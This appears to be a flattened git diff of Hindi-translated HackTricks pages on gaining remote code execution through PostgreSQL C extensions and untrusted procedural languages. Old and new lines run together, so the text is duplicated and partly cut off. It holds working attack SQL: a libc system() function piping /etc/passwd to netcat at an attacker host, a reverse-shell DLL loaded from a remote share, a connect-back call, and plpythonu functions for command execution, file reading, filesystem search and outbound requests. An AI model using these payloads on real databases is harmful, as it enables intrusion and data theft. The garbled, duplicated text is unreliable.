PostgreSQL को एक मुख्य विशेषता के रूप में एक्सटेंसिबिलिटी के साथ विकसित किया गया है, जिससे यह एक्सटेंशन को ऐसे अंगिकारी तरीके से शामिल कर सकता है जैसे कि वे अंतर्निहित कार्यक्षमताओं थे। ये एक्सटेंशन, मुख्य रूप से सी में लिखी पुस्तकालयें, डेटाबेस को अतिरिक्त कार्यों, ऑपरेटर्स, या प्रकारों के साथ समृद्ध करती हैं। PostgreSQL को एक मुख्य सुविधा के रूप में एक्सटेंसिबिलिटी के साथ विकसित किया गया है, जिससे यह ऐसा लगता है कि वे अंतर्निहित कार्यक्षमताओं के रूप में एक्सटेंशन को समर्न दता है। ये एक्सटेंशन, मुख्य रूप से सी में लिखी पुस्तकालयें हैं, डेटाबेस को अतिरिक्त कार्यों, ऑपरेटर्स, या प्रकारों के साथ समृद्ध करती हैं।
8.1 संस्करण से आगे, एक विशेष आवश्यकता एक्सटेंशन पुस्तकालयों पर लगाई जाती है: उन्हें एक विशेष हेडर के साथ कंपाइल किया जाना चाहिए। इसके बिना, PostgreSQL उन्हें नहीं चलाएगा, यह सुनिश्चित करता है कि केवल संगत और संभावित रूप से सुरक्षित एक्सटेंशन का उपयोग किया जाता है। 8.1 संस्करण से आगे, एक विशेष आवश्यकता एक्सटेंशन पुस्तकालयों पर लगाई गई है: उन्हें एक विशेष हेडर के साथ कंपाइल किया जाना चाहिए। इसके बिना, PostgreSQL उन्हें नहीं चलाएगा, यह सुनिश्चित करता है कि केवल संगत और संभावित रूप से सुरक्षित एक्सटेंशन का उपयोग किया जाता है।
इसके अलावा, ध्यान रखें कि **अगर आप नहीं जानते कि** [**PostgreSQL का दुरुपयोग करके विक्टिम को फ़ाइल अपलोड कैसे करें तो आपको इस पोस्ट को पढ़ना चाहिए।**](big-binary-files-upload-postgresql.md) इसके अलावा, ध्यान रखें कि **अगर आप नहीं जानते कि** [**PostgreSQL का दुरुपयोग करके शिकार पर फ़ाइलें अपलोड कैसे करें तो आपको इस पोस्ट को पढ़ना चाहिए।**](big-binary-files-upload-postgresql.md)
### लिनक्स में RCE ### लिनक्स में RCE
**अधिक जानकारी के लिए देखें: [https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)** **अधिक जानकारी के लिए देखें: [https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)**
PostgreSQL 8.1 और पहले संस्करणों से सिस्टम कमांड का निष्पादन एक प्रक्रिया है जिसे स्पष्ट रूप से दस्तावेज़ीकृत किया गया है और सीधा है। इसका उपयोग करना संभव है: [Metasploit मॉड्यूल](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload). PostgreSQL 8.1 और पहले संस्करण से सिस्टम कमांड का निष्पादन एक प्रक्रिया है जिसे स्पष्ट रूप से दस्तावेज़ीकृत किया गया है और सीधा है। इसका उपयोग करना संभव है: [Metasploit मॉड्यूल](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload).
```sql ```sql
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT; CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>'); SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
@ -78,7 +78,7 @@ $$ LANGUAGE 'plpgsql';
``` ```
</details> </details>
हालांकि, जब इसे अधिक वर्शन पर प्रयास किया गया **तो निम्नलिखित त्रुटि दिखाई दी गई थी**: हालांकि, जब इसे अधिक वर्शन पर प्रयास किया गया **तो निम्न त्रुटि दिखाई गई**:
```c ```c
ERROR: incompatible library “/lib/x86_64-linux-gnu/libc.so.6”: missing magic block ERROR: incompatible library “/lib/x86_64-linux-gnu/libc.so.6”: missing magic block
HINT: Extension libraries are required to use the PG_MODULE_MAGIC macro. HINT: Extension libraries are required to use the PG_MODULE_MAGIC macro.
@ -90,9 +90,9 @@ HINT: Extension libraries are required to use the PG_MODULE_MAGIC macro.
SELECT version(); SELECT version();
PostgreSQL 9.6.3 on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18) 6.3.0 20170516, 64-bit PostgreSQL 9.6.3 on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18) 6.3.0 20170516, 64-bit
``` ```
अनुकूलता के लिए, मुख्य संस्करणों को संरेखित करना आवश्यक है। इसलिए, 9.6.x श्रृंखला के किसी भी संस्करण के साथ एक पुस्तकालय को कंपाइल करना सफल सम्मिलन सुनिश्चित करना चाहिए। ### अनुकूलता के लिए, मुख्य संस्करणों को संरेखित करना आवश्यक है। इसलिए, 9.6.x श्रृंखला के किसी भी संस्करण के साथ एक पुस्तकालय को कंपाइल करना सफल सम्मिलन सुनिश्चित करना चाहिए।
उस संस्करण को अपने सिस्टम में स्थापित करने के लिए: **उस संस्करण को अपने सिस्टम में स्थापित करने के लिए:**
```bash ```bash
apt install postgresql postgresql-server-dev-9.6 apt install postgresql postgresql-server-dev-9.6
``` ```
@ -250,7 +250,7 @@ int32 arg = PG_GETARG_INT32(0);
PG_RETURN_INT32(arg + 1); PG_RETURN_INT32(arg + 1);
} }
``` ```
ध्यान दें कि इस मामले में **हानिकारक कोड DllMain फ़ंक्शन के अंदर** है। इसका मतलब है कि इस मामले में postgresql में लोड किए गए फ़ंक्शन को निष्पादित करने की आवश्यकता नहीं है, बस **DLL को लोड करना** रिवर्स शैल को **निष्पादित** करेगा: ध्यान दें कि इस मामले में **हानिकारक कोड DllMain फ़ंक्शन के अंदर है**। इसका मतलब है कि इस मामले में postgresql में लोड किए गए फ़ंक्शन को निष्पादित करने की आवश्यकता नहीं है, बस **DLL लोड करना** रिवर्स शैल को **निष्पादित** करेगा:
```c ```c
CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT; CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT;
``` ```
@ -258,11 +258,11 @@ CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\sha
PostgreSQL के **नवीनतम संस्करणों** में, प्रतिबंध लगाया गया है जहां `superuser` को विशेष निर्देशित निर्देशिकाओं से बाहर साझा पुस्तकालय फ़ाइलें **लोड** करने से **रोका गया है**, जैसे Windows पर `C:\Program Files\PostgreSQL\11\lib` या \*nix सिस्टम पर `/var/lib/postgresql/11/lib`. ये निर्देशिकाएँ या तो NETWORK\_SERVICE या postgres खातों द्वारा लिखने के प्रक्रियाओं से **सुरक्षित** हैं। PostgreSQL के **नवीनतम संस्करणों** में, प्रतिबंध लगाया गया है जहां `superuser` को विशेष निर्देशित निर्देशिकाओं से बाहर साझा पुस्तकालय फ़ाइलें **लोड** करने से **रोका गया है**, जैसे Windows पर `C:\Program Files\PostgreSQL\11\lib` या \*nix सिस्टम पर `/var/lib/postgresql/11/lib`. ये निर्देशिकाएँ या तो NETWORK\_SERVICE या postgres खातों द्वारा लिखने के प्रक्रियाओं से **सुरक्षित** हैं।
इन प्रतिबंधों के बावजूद, एक प्रमाणीकृत डेटाबेस `superuser` को "बड़े ऑब्जेक्ट्स" का उपयोग करके फ़ाइल सिस्टम में **लिखना संभव** है। यह क्षमता `C:\Program Files\PostgreSQL\11\data` निर्देशिका के अंदर लिखने तक फैलती है, जो तालिकाएँ अपडेट या बनाने जैसे डेटाबेस प्रक्रियाओं के लिए आवश्यक है। इन प्रतिबंधों के बावजूद, एक प्रमाणीकृत डेटाबेस `superuser` को "बड़े ऑब्जेक्ट्स" का उपयोग करके फ़ाइल सिस्टम में **बाइनर फ़ाइलें लिखना** संभव है। यह क्षमता `C:\Program Files\PostgreSQL\11\data` निर्देशिका के भीतर लिखने के लिए फैलाई जाती है, जो तालिकाएँ अपडेट या बनाने जैसे डेटाबेस प्रक्रियाओं के लिए आवश्यक है।
`CREATE FUNCTION` कमांड से एक महत्वपूर्ण सुरक्षा दोष उत्पन्न होता है, जो डेटा निर्देशिका में भ्रमण की अनुमति देता है। इस परिणामस्वरूप, एक प्रमाणीकृत हमलावर इस भ्रमण का शोध **उत्पन्न** कर सकता है ताकि वह डेटा निर्देशिका में एक साझा पुस्तकालय फ़ाइल लिख सके और फिर इसे **लोड** कर सके। यह उत्पादन हमलावर को विचारशील कोड को निषेध करने की अनुमति देता है, सिस्टम पर नेटिव कोड निष्पादन प्राप्त करता है। `CREATE FUNCTION` कमांड से एक महत्वपूर्ण सुरक्षा दोष उत्पन्न होता है, जो डेटा निर्देशिका में भ्रमण की अनुमति देता है। इस परिणामस्वरूप, एक प्रमाणीकृत हमलावर इस भ्रमण का शोध **उत्पन्न** कर सकता है ताकि वह डेटा निर्देशिका में एक साझा पुस्तकालय फ़ाइल लिख सके और फिर उसे **लोड** कर सके। यह शोध आक्रमणकारी को अनियमित कोड निष्पादित करने की संभावना प्रदान करता है, जिससे सिस्टम पर नेटिव कोड निष्पादन होता है।
#### हमले की प्रवाह #### हमल प्रवाह
सबसे पहले आपको **डीएल अपलोड करने के लिए बड़े ऑब्ज सबसे पहले आपको **डीएल अपलोड करने के लिए बड़े ऑब्ज
```c ```c
@ -271,8 +271,8 @@ select connect_back('192.168.100.54', 1234);
``` ```
_ध्यान दें कि आपको `.dll` एक्सटेंशन जोड़ने की आवश्यकता नहीं है क्योंकि निर्माण फ़ंक्शन इसे जोड़ देगा।_ _ध्यान दें कि आपको `.dll` एक्सटेंशन जोड़ने की आवश्यकता नहीं है क्योंकि निर्माण फ़ंक्शन इसे जोड़ देगा।_
अधिक जानकारी के लिए **यहाँ से** [**मूल प्रकाशन पढ़ें**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**।**\ अधिक जानकारी के लिए **यहाँ** [**मूल प्रकाशन पढ़ें**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**।**\
उस प्रकाशन में **यह** [**कोड उपयोग किया गया था ताकि पोस्टग्रेस एक्सटेंशन उत्पन्न किया जा सके**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_पोस्टग्रेस एक्सटेंशन को कैसे कंपाइल करें इसे सीखने के लिए किसी भी पिछले संस्करण को पढ़ें_।)\ उस प्रकाशन में **यह** [**कोड उपयोग किया गया था ताकि पोस्टग्रेस एक्सटेंशन उत्पन्न किया जा सके**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_पोस्टग्रेस एक्सटेंशन को कैसे कंपाइल करें इसे सीखने के लिए किसी भी पिछले संस्करणों को पढ़ें_।)\
उसी पृष्ठ पर इस **तकनीक को स्वचालित करने के लिए** यह एक्सप्लॉइट दिया गया था: उसी पृष्ठ पर इस **तकनीक को स्वचालित करने के लिए** यह एक्सप्लॉइट दिया गया था:
```python ```python
#!/usr/bin/env python3 #!/usr/bin/env python3
@ -320,10 +320,10 @@ print(" drop function connect_back(text, integer);")
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पीईएएस या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**दी पीएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह * [**दी पीईएएस परिवार**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके** * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>

View file

@ -1,24 +1,38 @@
# PostgreSQL भाषाएँ # RCE with PostgreSQL Languages
आपके पास पहुंच मिली PostgreSQL डेटाबेस में विभिन्न **स्क्रिप्टिंग भाषाएँ स्थापित** हो सकती हैं जिनका आप दुरुपयोग करके **विचारशील कोड को निष्पादित** कर सकते हैं। <details>
आप इन्हें **चला सकते हैं**: <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर** **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details>
## PostgreSQL Languages
आपको पहुंचने वाला PostgreSQL डेटाबेस विभिन्न **स्क्रिप्टिंग भाषाएं स्थापित** हो सकती हैं जिन्हें आप **कोड को निषेधित करने** के लिए दुरुपयोग कर सकते हैं।
आप **उन्हें चला सकते हैं**:
```sql ```sql
\dL * \dL *
SELECT lanname,lanpltrusted,lanacl FROM pg_language; SELECT lanname,lanpltrusted,lanacl FROM pg_language;
``` ```
अधिकांश स्क्रिप्टिंग भाषाओं को आप PostgreSQL में स्थापित कर सकते हैं जिनमें **2 प्रकार** होते हैं: **विश्वसनीय** और **अविश्वसनीय****अविश्वसनीय** भाषा का नाम **"u" से समाप्त होता है** और यह संस्करण आपको **कोड को निष्पादित** करने और अन्य रोचक फ़ंक्शन का उपयोग करने की अनुमति देगा। निम्नलिखित भाषाएं रुचिकर हो सकती हैं यदि इन्हें स्थापित किया जाए: एक बार जब आप PostgreSQL में स्क्रिप्टिंग भाषाएं इंस्टॉल कर लेते हैं, तो उनके **2 प्रकार** होते हैं: **विश्वसनीय** और **अविश्वसनीय****अविश्वसनीय** नाम में **"u" से समाप्त** होगा और यह वह संस्करण होगा जिससे आपको **कोड को निष्पादित** करने और अन्य दिलचस्प फ़ंक्शन का उपयोग करने की अनुमति होगी। ये ऐसी भाषाएं हैं जो यदि इंस्टॉल की जाती हैं तो दिलचस्प होती हैं:
* **plpythonu** * **plpythonu**
* **plpython3u** * **plpython3u**
* **plperlu** * **plperlu**
* **pljavaU** * **pljavaU**
* **plrubyu** * **plrubyu**
* ... (कोई भी अनुरक्षित संस्करण का उपयोग करने वाली अन्य कोई भाषा) * ... (कोई भी अन्य प्रोग्रामिंग भाषा जो एक असुरक्षित संस्करण का उपयोग करती है)
{% hint style="warning" %} {% hint style="warning" %}
यदि आपको लगता है कि कोई रुचिकर भाषा **स्थापित** है, लेकिन PostgreSQL द्वारा **अविश्वसनीय** मान्यता दी गई है (**`lanpltrusted`** की मान्यता **`false`** है), तो आप इसे निम्नलिखित पंक्ति के साथ **विश्वसनीय** बनाने का प्रयास कर सकते हैं ताकि PostgreSQL द्वारा कोई प्रतिबंध लागू न हो: यदि आपको लगता है कि कोई दिलचस्प भाषा **इंस्टॉल की गई** है लेकिन PostgreSQL द्वारा **अविश्वसनीय** मानी जाती है (**`lanpltrusted`** **`false`** है), तो आप इसे **विश्वसनीय** बनाने की कोशिश कर सकते हैं ताकि PostgreSQL द्वारा कोई प्रतिबंध लागू न हो:
```sql ```sql
UPDATE pg_language SET lanpltrusted=true WHERE lanname='plpythonu'; UPDATE pg_language SET lanpltrusted=true WHERE lanname='plpythonu';
# To check your permissions over the table pg_language # To check your permissions over the table pg_language
@ -27,7 +41,7 @@ SELECT * FROM information_schema.table_privileges WHERE table_name = 'pg_languag
{% endhint %} {% endhint %}
{% hint style="danger" %} {% hint style="danger" %}
यदि आप कोई भाषा नहीं देखते हैं, तो आप इसे लोड करने का प्रयास कर सकते हैं (**आपको सुपरएडमिन होना चाहिए**): अगर आप किसी भाषा को नहीं देखते ह। तो आप इसे लोड करने की कोशिश कर सकते हैं (**आपको सुपर एडमिन होना चाहिए**):
``` ```
CREATE EXTENSION plpythonu; CREATE EXTENSION plpythonu;
CREATE EXTENSION plpython3u; CREATE EXTENSION plpython3u;
@ -37,7 +51,7 @@ CREATE EXTENSION plrubyu;
``` ```
{% endhint %} {% endhint %}
ध्यान दें कि सुरक्षित संस्करणों को "असुरक्षित" रूप में कंपाइल किया जा सकता है। उदाहरण के लिए [**यह**](https://www.robbyonrails.com/articles/2005/08/22/installing-untrusted-pl-ruby-for-postgresql.html) देखें। इसलिए यह हमेशा मूल्यांककरने योग्य होता है कि क्या आप कोड को निष्पादित कर सकते हैं, यदि आपको केवल **विश्वसनीय** वाला ही मिलता है ध्यान दें कि सुरक्षित संस्करणों को "असुरक्षित" रूप में कॉम्पाइल करना संभव है। [**यह**](https://www.robbyonrails.com/articles/2005/08/22/installing-untrusted-pl-ruby-for-postgresql.html) की जाँच करें। उदाहरण के लिए। इसलिए यह हमेशा मूल्यान है कि क्या आप कोड को निष्पादित कर सकते हैं भले ही आपको केवल **विश्वसनीय** वाला ही मिले
## plpythonu/plpython3u ## plpythonu/plpython3u
@ -55,7 +69,13 @@ LANGUAGE 'plpythonu';
SELECT cmd("ls"); #RCE with popen or execve SELECT cmd("ls"); #RCE with popen or execve
``` ```
{% tab title="ओएस उपयोगकर्ता प्राप्त करें" %} {% endtab %}
{% tab title="Get OS user" %}
ओएस उपयोगकर्ता प्राप्त करें
{% endtab %}
```sql ```sql
CREATE OR REPLACE FUNCTION get_user (pkg text) CREATE OR REPLACE FUNCTION get_user (pkg text)
RETURNS VARCHAR(65535) stable RETURNS VARCHAR(65535) stable
@ -67,7 +87,9 @@ LANGUAGE 'plpythonu';
SELECT get_user(""); #Get user, para is useless SELECT get_user(""); #Get user, para is useless
``` ```
{% tab title="डायरेक्टरी की सूची बनाएं" %} {% endtab %}
{% tab title="सूची डायरेक्टरी" %}
```sql ```sql
CREATE OR REPLACE FUNCTION lsdir (dir text) CREATE OR REPLACE FUNCTION lsdir (dir text)
RETURNS VARCHAR(65535) stable RETURNS VARCHAR(65535) stable
@ -81,7 +103,9 @@ LANGUAGE 'plpythonu';
SELECT lsdir("/"); #List dir SELECT lsdir("/"); #List dir
``` ```
{% tab title="W फ़ोल्डर ढूंढें" %} {% endtab %}
{% tab title="डब्ल्यू फ़ोल्डर खोजें" %}
```sql ```sql
CREATE OR REPLACE FUNCTION findw (dir text) CREATE OR REPLACE FUNCTION findw (dir text)
RETURNS VARCHAR(65535) stable RETURNS VARCHAR(65535) stable
@ -108,6 +132,8 @@ LANGUAGE 'plpythonu';
SELECT findw("/"); #Find Writable folders from a folder (recursively) SELECT findw("/"); #Find Writable folders from a folder (recursively)
``` ```
{% endtab %}
{% tab title="फ़ाइल खोजें" %} {% tab title="फ़ाइल खोजें" %}
```sql ```sql
CREATE OR REPLACE FUNCTION find_file (exe_sea text) CREATE OR REPLACE FUNCTION find_file (exe_sea text)
@ -141,7 +167,9 @@ LANGUAGE 'plpythonu';
SELECT find_file("psql"); #Find a file SELECT find_file("psql"); #Find a file
``` ```
{% tab title="एक्सीक्यूटेबल्स खोजें" %} {% endtab %}
{% tab title="एक्जीक्यूटेबल्स खोजें" %}
```sql ```sql
CREATE OR REPLACE FUNCTION findx (dir text) CREATE OR REPLACE FUNCTION findx (dir text)
RETURNS VARCHAR(65535) stable RETURNS VARCHAR(65535) stable
@ -173,7 +201,9 @@ LANGUAGE 'plpythonu';
SELECT findx("/"); #Find an executables in folder (recursively) SELECT findx("/"); #Find an executables in folder (recursively)
``` ```
{% tab title="सब्स के द्वारा exec ढूंढें" %} {% endtab %}
{% tab title="उपस्थिति द्वारा एक्सेक खोजें" %}
```sql ```sql
CREATE OR REPLACE FUNCTION find_exe (exe_sea text) CREATE OR REPLACE FUNCTION find_exe (exe_sea text)
RETURNS VARCHAR(65535) stable RETURNS VARCHAR(65535) stable
@ -206,6 +236,8 @@ LANGUAGE 'plpythonu';
SELECT find_exe("psql"); #Find executable by susbstring SELECT find_exe("psql"); #Find executable by susbstring
``` ```
{% endtab %}
{% tab title="पढ़ें" %} {% tab title="पढ़ें" %}
```sql ```sql
CREATE OR REPLACE FUNCTION read (path text) CREATE OR REPLACE FUNCTION read (path text)
@ -220,7 +252,9 @@ LANGUAGE 'plpythonu';
select read('/etc/passwd'); #Read a file in b64 select read('/etc/passwd'); #Read a file in b64
``` ```
{% tab title="परमिशन प्राप्त करें" %} {% endtab %}
{% tab title="प्राप्त करें अनुमतियाँ" %}
```sql ```sql
CREATE OR REPLACE FUNCTION get_perms (path text) CREATE OR REPLACE FUNCTION get_perms (path text)
RETURNS VARCHAR(65535) stable RETURNS VARCHAR(65535) stable
@ -234,6 +268,8 @@ LANGUAGE 'plpythonu';
select get_perms("/etc/passwd"); # Get perms of file select get_perms("/etc/passwd"); # Get perms of file
``` ```
{% endtab %}
{% tab title="अनुरोध" %} {% tab title="अनुरोध" %}
```sql ```sql
CREATE OR REPLACE FUNCTION req2 (url text) CREATE OR REPLACE FUNCTION req2 (url text)
@ -258,12 +294,9 @@ LANGUAGE 'plpythonu';
SELECT req3('https://google.com'); #Request using python3 SELECT req3('https://google.com'); #Request using python3
``` ```
{% endtab %}
{% endtabs %}
## pgSQL ## pgSQL
निम्नलिखित पृष्ठ की जाच करें: निम्नलिखित पृष्ठ की जाँच करें:
{% content-ref url="pl-pgsql-password-bruteforce.md" %} {% content-ref url="pl-pgsql-password-bruteforce.md" %}
[pl-pgsql-password-bruteforce.md](pl-pgsql-password-bruteforce.md) [pl-pgsql-password-bruteforce.md](pl-pgsql-password-bruteforce.md)
@ -271,7 +304,7 @@ SELECT req3('https://google.com'); #Request using python3
## C ## C
निम्नलिखित पृष्ठ की जाच करें: निम्नलिखित पृष्ठ की जाच करें:
{% content-ref url="rce-with-postgresql-extensions.md" %} {% content-ref url="rce-with-postgresql-extensions.md" %}
[rce-with-postgresql-extensions.md](rce-with-postgresql-extensions.md) [rce-with-postgresql-extensions.md](rce-with-postgresql-extensions.md)
@ -281,10 +314,10 @@ SELECT req3('https://google.com'); #Request using python3
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **नवीनतम संस्करण का पीएएसएस देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **अपने हैकिंग ट्रिक्स साझा करें,** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके।** * **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** में **पीआर जमा करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details> </details>

View file

@ -4,17 +4,17 @@
